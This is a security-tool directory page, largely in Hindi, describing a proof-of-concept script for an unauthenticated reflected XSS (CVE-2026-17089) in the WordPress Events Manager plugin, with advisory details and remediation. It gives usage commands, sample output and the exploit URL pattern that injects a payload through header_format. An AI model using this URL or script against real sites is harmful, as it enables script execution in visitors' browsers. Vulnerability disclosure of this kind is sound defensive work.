Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-17089-PoC-pwnVader — CVE-2026-17089 के लिए Shell PoC, WordPress Events Manager plugin (<= 7.4.0.1) में एक unauthenticated reflected XSS; plugin की fingerprinting करता है और header_format reflection का परीक्षण करता है। | Kitploit
उपकरण/GitHubGitHub/pwnvader/cve-2026-17089-poc-pwnvader
भेद्यता स्कैनरवेब भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHub
pwnvader/cve-2026-17089-poc-pwnvader

CVE-2026-17089-PoC-pwnVader

CVE-2026-17089 के लिए Shell PoC, WordPress Events Manager plugin (<= 7.4.0.1) में एक unauthenticated reflected XSS; plugin की fingerprinting करता है और header_format reflection का परीक्षण करता है।

रिपॉजिटरी देखें
10 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-17089 — Events Manager <= 7.4.0.1 — अनधिकृत प्रतिबिंबित XSS (header_format)

लेखक: pwnVader · लाइसेंस: MIT (रिपॉज़िटरी रूट)

घटकEvents Manager – Calendar, Bookings, Tickets, and more! (WordPress प्लगइन)
प्रकारCWE-79 — प्रतिबिंबित क्रॉस-साइट स्क्रिप्टिंग
प्रभावित<= 7.4.0.1
ठीक किया गयाबाद का 7.4.x रिलीज़ (EM_Events::output_grouped() में wp_kses_post() लागू)
CVECVE-2026-17089 — CVSS 3.1 6.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
PoCpoc.sh

सारांश

शॉर्टकोड प्रवेश बिंदु header_format को wp_kses() से सैनिटाइज़ करता है, लेकिन अनधिकृत AJAX एक्शन search_events_grouped उस सैनिटाइज़ेशन को बायपास करता है और मान को HTML प्रतिक्रिया में प्रतिध्वनित करता है (EM_Events::output_grouped())। एक दूरस्थ, अनधिकृत हमलावर एक URL तैयार कर सकता है जो प्रभावित साइट के ओरिजिन में मनमाना JavaScript निष्पादित करता है, उस किसी भी उपयोगकर्ता के लिए जो इसे खोलता है (UI:R)।

उपयोग

# Interactive menu
./poc.sh

# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com

# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"

उदाहरण आउटपुट (check)

== CVE-2026-17089 PoC (check) ==
target: https://example.com

[1] Plugin fingerprint (read-only)
  [PASS] Events Manager assets are served (plugin installed)
  [info] Stable tag: 7.1.7
  [PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)

[2] Unauthenticated reflection test (read-only, benign marker)
  [PASS] endpoint reflected header_format UNESCAPED (the raw  is in the response)

== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).

एक्सप्लॉइट URL

https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>

डिटेक्शन लॉजिक

  1. फिंगरप्रिंट: readme.txt (Stable tag) और/या प्लगइन एसेट पथ /wp-content/plugins/events-manager/includes/js/events-manager.js।
  2. एक बिनाइन मार्कर (``) को admin-ajax.php?action=search_events_grouped पर भेजें, जिसमें header_format मार्कर पर सेट हो, और जाँचें कि क्या कच्चा मार्कअप प्रतिक्रिया बॉडी में बिना एस्केप के प्रतिबिंबित होता है।

उपचार

  • Events Manager को वर्तमान रिलीज़ में अपडेट करें (फिक्स रेंडरिंग फ़ंक्शन के अंदर header_format पर wp_kses_post() लागू करता है, जो हर कॉलर को कवर करता है)।
  • अंतरिम: अनधिकृत search_events_grouped AJAX एक्शन को ब्लॉक करें या WAF/एप्लिकेशन स्तर पर header_format को फ़िल्टर करें।

संदर्भ

  • NVD — CVE-2026-17089: https://nvd.nist.gov/vuln/detail/CVE-2026-17089
  • GitHub Advisory: https://github.com/advisories/GHSA-gg76-jx66-hjq8

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण के लिए। PoC रीड-ओनली है (check) या एक URL प्रिंट करता है (url); कोई डेटा संशोधित नहीं होता।

टूल डाउनलोड करें